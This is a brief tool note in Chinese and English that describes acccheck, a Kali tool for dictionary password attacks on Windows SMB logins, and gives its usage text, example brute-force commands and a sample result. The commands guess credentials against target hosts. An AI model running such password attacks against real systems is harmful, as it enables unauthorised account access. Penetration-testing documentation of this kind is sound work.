kali信息收集工具之acccheck

The tool is designed as a password dictionary attack tool that targets windows authentication via the SMB protocol. It is really a wrapper script around the ‘smbclient’ binary, and as a result is dependent on it for its execution.

一个基于微软SMB协议的口令攻击工具，IPC共享攻击工具

常用端口为135，139

个人感觉该工具攻击的范围及能力有限，不过在特定情况下也可以发挥一定的作用

acccheck – Password dictionary attack tool for SMB

root@kali:~# acccheck

acccheck v0.2.1 - By Faiz

Description:

Attempts to connect to the IPCandADMIN shares depending on which flags have been

chosen, and tries a combination of usernames and passwords in the hope to identify

the password to a given account via a dictionary password guessing attack.

Usage = ./acccheck [optional]

-t [single host IP address]

OR

-T [file containing target ip address(es)]

Optional:

-p [single password]

-P [file containing passwords]

-u [single user]

-U [file containing usernames]

-v [verbose mode]

Examples

Attempt the ‘Administrator’ account with a [BLANK] password.

acccheck -t 10.10.10.1

Attempt all passwords in ‘password.txt’ against the ‘Administrator’ account.

acccheck -t 10.10.10.1 -P password.txt

Attempt all password in ‘password.txt’ against all users in ‘users.txt’.

acccehck -t 10.10.10.1 -U users.txt -P password.txt

Attempt a single password against a single user.

acccheck -t 10.10.10.1 -u administrator -p password

acccheck Usage Example

Scan the IP addresses contained in smb-ips.txt (-T) and use verbose output (-v):

root@kali:~# acccheck.pl -T smb-ips.txt -v

Host:192.168.1.201, Username:Administrator, Password:BLANK